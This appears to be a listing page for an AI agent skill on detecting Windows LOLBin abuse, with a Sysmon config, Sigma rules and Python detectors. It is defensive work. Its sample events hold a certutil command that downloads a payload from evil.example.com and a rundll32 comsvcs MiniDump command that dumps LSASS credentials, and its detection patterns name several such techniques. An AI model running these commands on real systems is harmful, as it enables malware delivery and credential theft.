detecting-living-off-the-land-attacks
Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.
4,032 stars
bymukul975
Best use case
detecting-living-off-the-land-attacks is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.
Teams using detecting-living-off-the-land-attacks should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
$curl -o ~/.claude/skills/detecting-living-off-the-land-attacks/SKILL.md --create-dirs "https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/main/skills/detecting-living-off-the-land-attacks/SKILL.md"
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/detecting-living-off-the-land-attacks/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How detecting-living-off-the-land-attacks Compares
| Feature / Agent | detecting-living-off-the-land-attacks | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
Top AI Agents for Productivity
See the top AI agent skills for productivity, workflow automation, operational systems, documentation, and everyday task execution.
AI Agents for Marketing
Discover AI agents for marketing workflows, from SEO and content production to campaign research, outreach, and analytics.
SKILL.md Source
# Detecting Living Off the Land Attacks
Monitor for suspicious use of legitimate Windows binaries (LOLBins)
including certutil, mshta, rundll32, regsvr32, and others used in
fileless and living-off-the-land attack techniques.
## When to Use
- Building detection rules for SIEM or EDR platforms to catch LOLBin abuse in real time
- Investigating alerts where legitimate system binaries appear in unexpected execution contexts
- Threat hunting across endpoint telemetry for fileless attack indicators
- Hardening application whitelisting policies (AppLocker, WDAC) to restrict dangerous LOLBin usage
- Creating Sysmon configurations tuned to capture LOLBin-related process creation events
- Responding to incidents where adversaries bypassed AV by using only built-in OS tools
**Do not use** for blocking all LOLBin execution outright; these are legitimate system tools with valid administrative uses. Detection must focus on anomalous context (parent process, command-line arguments, network activity) rather than binary presence alone.
## Prerequisites
- Sysmon v15+ installed on Windows endpoints with a tuned configuration (SwiftOnSecurity or Olaf Hartong baseline)
- SIEM platform ingesting Sysmon Event IDs 1 (Process Create), 3 (Network Connection), 7 (Image Loaded), 11 (File Create)
- Windows Event Log forwarding for Security Event IDs 4688 (Process Creation with command-line logging enabled)
- LOLBAS project reference: https://lolbas-project.github.io/
- Python 3.8+ with `evtx`, `pandas` for offline log analysis
- Sigma rule repository for cross-platform detection rule authoring
## Workflow
### Step 1: Deploy a LOLBin-Focused Sysmon Configuration
Create a Sysmon config that captures the process creation and network events needed for LOLBin detection:
```xml
<!-- File: sysmon-lolbin-detection.xml -->
<Sysmon schemaversion="4.90">
<EventFiltering>
<!-- Process Creation: capture all LOLBin executions with full command lines -->
<RuleGroup name="LOLBin Process Creation" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="end with">certutil.exe</Image>
<Image condition="end with">mshta.exe</Image>
<Image condition="end with">rundll32.exe</Image>
<Image condition="end with">regsvr32.exe</Image>
<Image condition="end with">msbuild.exe</Image>
<Image condition="end with">installutil.exe</Image>
<Image condition="end with">cmstp.exe</Image>
<Image condition="end with">wmic.exe</Image>
<Image condition="end with">bitsadmin.exe</Image>
<Image condition="end with">certreq.exe</Image>
<Image condition="end with">esentutl.exe</Image>
<Image condition="end with">expand.exe</Image>
<Image condition="end with">extrac32.exe</Image>
<Image condition="end with">findstr.exe</Image>
<Image condition="end with">hh.exe</Image>
<Image condition="end with">ie4uinit.exe</Image>
<Image condition="end with">mavinject.exe</Image>
<Image condition="end with">msiexec.exe</Image>
<Image condition="end with">odbcconf.exe</Image>
<Image condition="end with">pcalua.exe</Image>
<Image condition="end with">presentationhost.exe</Image>
<Image condition="end with">replace.exe</Image>
<Image condition="end with">xwizard.exe</Image>
<!-- PowerShell variants -->
<Image condition="end with">powershell.exe</Image>
<Image condition="end with">pwsh.exe</Image>
<!-- Script hosts -->
<Image condition="end with">cscript.exe</Image>
<Image condition="end with">wscript.exe</Image>
</ProcessCreate>
</RuleGroup>
<!-- Network connections from LOLBins (highly suspicious) -->
<RuleGroup name="LOLBin Network" groupRelation="or">
<NetworkConnect onmatch="include">
<Image condition="end with">certutil.exe</Image>
<Image condition="end with">mshta.exe</Image>
<Image condition="end with">rundll32.exe</Image>
<Image condition="end with">regsvr32.exe</Image>
<Image condition="end with">msbuild.exe</Image>
<Image condition="end with">bitsadmin.exe</Image>
<Image condition="end with">expand.exe</Image>
<Image condition="end with">esentutl.exe</Image>
<Image condition="end with">replace.exe</Image>
</NetworkConnect>
</RuleGroup>
</EventFiltering>
</Sysmon>
```
```powershell
# Install or update Sysmon with the LOLBin config
sysmon64.exe -accepteula -i sysmon-lolbin-detection.xml
# Update existing Sysmon installation
sysmon64.exe -c sysmon-lolbin-detection.xml
```
### Step 2: Build Sigma Detection Rules for Key LOLBins
Write Sigma rules that detect specific abuse patterns, translatable to any SIEM:
```yaml
# File: sigma/certutil_download.yml
title: Certutil Used to Download File
id: a1b2c3d4-5678-9abc-def0-123456789abc
status: stable
description: >
Detects certutil.exe being used to download files from remote URLs,
a common LOLBin technique for payload delivery (LOLBAS T1105).
references:
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/
- https://attack.mitre.org/techniques/T1105/
author: Threat Detection Team
date: 2026/01/20
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\certutil.exe'
CommandLine|contains|all:
- 'urlcache'
- '-f'
- 'http'
condition: selection
falsepositives:
- Legitimate certificate enrollment using certutil with URL parameters
level: high
tags:
- attack.defense_evasion
- attack.t1218
- attack.command_and_control
- attack.t1105
```
```yaml
# File: sigma/mshta_execution.yml
title: MSHTA Executing Remote or Inline Script
id: b2c3d4e5-6789-abcd-ef01-234567890bcd
status: stable
description: >
Detects mshta.exe executing scripts from URLs or inline VBScript/JavaScript,
commonly used for application whitelisting bypass and initial access.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- https://attack.mitre.org/techniques/T1218/005/
logsource:
category: process_creation
product: windows
detection:
selection_remote:
Image|endswith: '\mshta.exe'
CommandLine|contains: 'http'
selection_inline:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'vbscript:'
- 'javascript:'
selection_parent_anomaly:
Image|endswith: '\mshta.exe'
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\outlook.exe'
- '\powerpnt.exe'
condition: selection_remote or selection_inline or selection_parent_anomaly
falsepositives:
- Legacy HTA-based internal applications
level: high
```
```yaml
# File: sigma/regsvr32_scrobj.yml
title: Regsvr32 Squiblydoo Scriptlet Execution
id: c3d4e5f6-7890-bcde-f012-345678901cde
status: stable
description: >
Detects regsvr32.exe loading scrobj.dll with a remote scriptlet URL,
known as the Squiblydoo technique for AppLocker bypass.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
- https://attack.mitre.org/techniques/T1218/010/
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|all:
- 'scrobj.dll'
- '/i:'
condition: selection
falsepositives:
- Legitimate COM scriptlet registration (rare in modern environments)
level: critical
```
### Step 3: Analyze Sysmon Logs for LOLBin Abuse Patterns
Parse and correlate Sysmon events to identify suspicious LOLBin execution:
```python
import json
import re
from datetime import datetime, timedelta
from collections import defaultdict
from pathlib import Path
# Known LOLBins and their suspicious command-line indicators
LOLBIN_SIGNATURES = {
"certutil.exe": {
"suspicious_args": [
r"-urlcache\s+-f\s+http",
r"-decode\s+",
r"-encode\s+",
r"-verifyctl\s+.*http",
],
"mitre": "T1218, T1105",
"severity": "high"
},
"mshta.exe": {
"suspicious_args": [
r"https?://",
r"vbscript:",
r"javascript:",
r"about:",
],
"mitre": "T1218.005",
"severity": "high"
},
"rundll32.exe": {
"suspicious_args": [
r"javascript:",
r"shell32\.dll.*ShellExec_RunDLL",
r"\\\\.*\\.*\.dll", # UNC path DLL loading
r"comsvcs\.dll.*MiniDump", # LSASS dump via comsvcs
],
"mitre": "T1218.011",
"severity": "critical"
},
"regsvr32.exe": {
"suspicious_args": [
r"/s\s+/n\s+/u\s+/i:",
r"scrobj\.dll",
r"https?://",
],
"mitre": "T1218.010",
"severity": "critical"
},
"bitsadmin.exe": {
"suspicious_args": [
r"/transfer\s+.*https?://",
r"/create\s+.*\/addfile\s+.*https?://",
r"/SetNotifyCmdLine",
],
"mitre": "T1197",
"severity": "high"
},
"wmic.exe": {
"suspicious_args": [
r"process\s+call\s+create",
r"/node:",
r"os\s+get\s+/format:.*https?://",
r"xsl.*https?://",
],
"mitre": "T1047",
"severity": "high"
},
"msbuild.exe": {
"suspicious_args": [
r"\.xml\b",
r"\.csproj\b",
r"\\temp\\",
r"\\appdata\\",
],
"mitre": "T1127.001",
"severity": "high"
},
"mavinject.exe": {
"suspicious_args": [
r"/INJECTRUNNING\s+\d+",
],
"mitre": "T1218.013",
"severity": "critical"
},
}
def analyze_sysmon_events(events):
"""Analyze Sysmon process creation events for LOLBin abuse."""
alerts = []
for event in events:
image = event.get("Image", "").lower()
cmdline = event.get("CommandLine", "")
parent = event.get("ParentImage", "")
# Check if the process is a known LOLBin
for lolbin, config in LOLBIN_SIGNATURES.items():
if image.endswith(lolbin.lower()):
for pattern in config["suspicious_args"]:
if re.search(pattern, cmdline, re.IGNORECASE):
alert = {
"timestamp": event.get("UtcTime", ""),
"hostname": event.get("Computer", ""),
"lolbin": lolbin,
"command_line": cmdline,
"parent_process": parent,
"user": event.get("User", ""),
"process_id": event.get("ProcessId", ""),
"parent_pid": event.get("ParentProcessId", ""),
"mitre_technique": config["mitre"],
"severity": config["severity"],
"matched_pattern": pattern,
}
alerts.append(alert)
break
return alerts
# Example usage with parsed Sysmon events
sample_events = [
{
"UtcTime": "2026-01-20 14:32:15.000",
"Computer": "WORKSTATION-01",
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil.exe -urlcache -f http://evil.example.com/payload.exe C:\\temp\\update.exe",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "CORP\\jsmith",
"ProcessId": "4532",
"ParentProcessId": "2108",
},
{
"UtcTime": "2026-01-20 14:33:01.000",
"Computer": "WORKSTATION-01",
"Image": "C:\\Windows\\System32\\rundll32.exe",
"CommandLine": "rundll32.exe comsvcs.dll, MiniDump 624 C:\\temp\\dump.bin full",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "CORP\\jsmith",
"ProcessId": "5128",
"ParentProcessId": "2108",
},
]
alerts = analyze_sysmon_events(sample_events)
for alert in alerts:
print(f"[{alert['severity'].upper()}] {alert['lolbin']} on {alert['hostname']}")
print(f" MITRE: {alert['mitre_technique']}")
print(f" Command: {alert['command_line'][:120]}")
print(f" Parent: {alert['parent_process']}")
print(f" User: {alert['user']}")
print()
```
### Step 4: Detect LOLBin Network Connections
LOLBins making outbound network connections is a strong indicator of malicious use:
```python
def detect_lolbin_network_activity(network_events, process_events):
"""Correlate Sysmon network events (ID 3) with process creation (ID 1)
to find LOLBins making outbound connections."""
# LOLBins that should rarely make outbound connections
NETWORK_SUSPICIOUS = {
"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
"msbuild.exe", "installutil.exe", "bitsadmin.exe", "esentutl.exe",
"expand.exe", "replace.exe", "cmstp.exe", "presentationhost.exe",
}
alerts = []
for event in network_events:
image = event.get("Image", "").lower()
binary_name = image.split("\\")[-1] if "\\" in image else image
if binary_name in NETWORK_SUSPICIOUS:
dest_ip = event.get("DestinationIp", "")
dest_port = event.get("DestinationPort", "")
# Skip localhost and internal DNS
if dest_ip.startswith("127.") or dest_ip == "::1":
continue
alert = {
"type": "lolbin_network_connection",
"binary": binary_name,
"destination_ip": dest_ip,
"destination_port": dest_port,
"destination_hostname": event.get("DestinationHostname", ""),
"source_ip": event.get("SourceIp", ""),
"user": event.get("User", ""),
"timestamp": event.get("UtcTime", ""),
"severity": "critical",
}
alerts.append(alert)
print(f"[CRITICAL] {binary_name} connected to "
f"{dest_ip}:{dest_port} ({event.get('DestinationHostname', 'N/A')})")
return alerts
```
### Step 5: Monitor Anomalous Parent-Child Process Relationships
```python
# Suspicious parent-child relationships indicating LOLBin abuse
SUSPICIOUS_PARENT_CHILD = [
# Office apps spawning LOLBins (macro execution)
{"parent": ["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"],
"child": ["cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
"wscript.exe", "cscript.exe", "certutil.exe"],
"severity": "critical", "mitre": "T1204.002"},
# Explorer spawning script interpreters directly
{"parent": ["explorer.exe"],
"child": ["mshta.exe", "regsvr32.exe", "msbuild.exe"],
"severity": "high", "mitre": "T1218"},
# WMI provider spawning processes (lateral movement)
{"parent": ["wmiprvse.exe"],
"child": ["cmd.exe", "powershell.exe", "mshta.exe"],
"severity": "critical", "mitre": "T1047"},
# Services spawning unusual children
{"parent": ["services.exe"],
"child": ["cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe"],
"severity": "high", "mitre": "T1543.003"},
]
def check_parent_child_anomaly(event):
"""Check if a process creation event has a suspicious parent-child pair."""
parent = event.get("ParentImage", "").split("\\")[-1].lower()
child = event.get("Image", "").split("\\")[-1].lower()
for rule in SUSPICIOUS_PARENT_CHILD:
if parent in rule["parent"] and child in rule["child"]:
return {
"alert_type": "suspicious_parent_child",
"parent": parent,
"child": child,
"command_line": event.get("CommandLine", ""),
"mitre": rule["mitre"],
"severity": rule["severity"],
"hostname": event.get("Computer", ""),
"user": event.get("User", ""),
"timestamp": event.get("UtcTime", ""),
}
return None
```
### Step 6: Implement AppLocker or WDAC Hardening
Restrict unnecessary LOLBin execution with application control policies:
```powershell
# Query current AppLocker policy
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
# Create AppLocker rules to restrict certutil to admin-only
$rule = New-AppLockerPolicy -RuleType Publisher -RuleNamePrefix "Block" `
-FileInformation "C:\Windows\System32\certutil.exe" `
-User "S-1-1-0" -Deny
# Export current policy for backup before applying changes
Get-AppLockerPolicy -Effective -Xml > AppLocker_Backup.xml
# Block specific LOLBins for standard users via GPO script
$lolbins_to_restrict = @(
"mshta.exe", "cmstp.exe", "msbuild.exe", "installutil.exe",
"regsvr32.exe", "presentationhost.exe", "ie4uinit.exe",
"mavinject.exe", "xwizard.exe"
)
foreach ($binary in $lolbins_to_restrict) {
$path = "C:\Windows\System32\$binary"
if (Test-Path $path) {
Write-Output "Restricting: $path"
# Apply WDAC deny rule via PowerShell
# In production, use Group Policy or Intune WDAC policies
}
}
```
## Verification
- Confirm Sysmon is logging Event ID 1 (Process Creation) with full command-line arguments for all listed LOLBins
- Validate Sigma rules convert correctly to your SIEM query language using `sigmac` or `sigma-cli`
- Test detection by executing benign LOLBin commands in a lab environment and confirming alerts fire
- Verify parent-child anomaly detection catches Office-to-LOLBin chains (e.g., `winword.exe` spawning `certutil.exe`)
- Confirm LOLBin network connection detection triggers when `certutil.exe` or `mshta.exe` reach out to external IPs
- Check that AppLocker or WDAC policies do not break legitimate administrative workflows before deploying to production
- Validate false positive rates by running detection rules against 7 days of baseline telemetry from a clean environment
- Cross-reference detections against the LOLBAS project database at https://lolbas-project.github.io/ for completenessRelated Skills
performing-threat-landscape-assessment-for-sector
4032
from mukul975/Anthropic-Cybersecurity-Skills
Conduct a sector-specific threat landscape assessment by analyzing threat actor targeting patterns, common attack vectors, and industry-specific vulnerabilities to inform organizational risk management.
hunting-for-ntlm-relay-attacks
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detect NTLM relay attacks by analyzing Windows Event 4624 logon type 3 with NTLMSSP authentication, identifying IP-to-hostname mismatches, Responder traffic signatures, SMB signing status, and suspicious authentication patterns across the domain.
hunting-for-living-off-the-land-binaries
4032
from mukul975/Anthropic-Cybersecurity-Skills
Proactively hunt for adversary abuse of legitimate system binaries (LOLBins) to execute malicious payloads while evading detection.
hunting-for-living-off-the-cloud-techniques
4032
from mukul975/Anthropic-Cybersecurity-Skills
Hunt for adversary abuse of legitimate cloud services for C2, data staging, and exfiltration including abuse of Azure, AWS, GCP services, and SaaS platforms.
hunting-for-dcsync-attacks
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detect DCSync attacks by analyzing Windows Event ID 4662 for unauthorized DS-Replication-Get-Changes requests from non-domain-controller accounts.
hunting-credential-stuffing-attacks
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detects credential stuffing attacks by analyzing authentication logs for login velocity anomalies, ASN diversity, password spray patterns, and geographic distribution of failed logins. Uses statistical analysis on Splunk or raw log data. Use when investigating account takeover campaigns or building detection rules for auth abuse.
detecting-wmi-persistence
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detect WMI event subscription persistence by analyzing Sysmon Event IDs 19, 20, and 21 for malicious EventFilter, EventConsumer, and FilterToConsumerBinding creation.
detecting-typosquatting-packages-in-npm-pypi
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detects typosquatting attacks in npm and PyPI package registries by analyzing package name similarity using Levenshtein distance and other string metrics, examining publish date heuristics to identify recently created packages mimicking established ones, and flagging download count anomalies where suspicious packages have disproportionately low usage compared to their legitimate targets. The analyst queries the PyPI JSON API and npm registry API to gather package metadata for automated comparison. Activates for requests involving package typosquatting detection, dependency confusion analysis, malicious package identification, or software supply chain threat hunting in package registries.
detecting-t1548-abuse-elevation-control-mechanism
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detect abuse of elevation control mechanisms including UAC bypass, sudo exploitation, and setuid/setgid manipulation by monitoring registry modifications, process elevation flags, and unusual parent-child process relationships.
detecting-t1055-process-injection-with-sysmon
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detect process injection techniques (T1055) including classic DLL injection, process hollowing, and APC injection by analyzing Sysmon events for cross-process memory operations, remote thread creation, and anomalous DLL loading patterns.
detecting-t1003-credential-dumping-with-edr
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detect OS credential dumping techniques targeting LSASS memory, SAM database, NTDS.dit, and cached credentials using EDR telemetry, Sysmon process access monitoring, and Windows security event correlation.
detecting-suspicious-powershell-execution
4032
from mukul975/Anthropic-Cybersecurity-Skills
Detect suspicious PowerShell execution patterns including encoded commands, download cradles, AMSI bypass attempts, and constrained language mode evasion.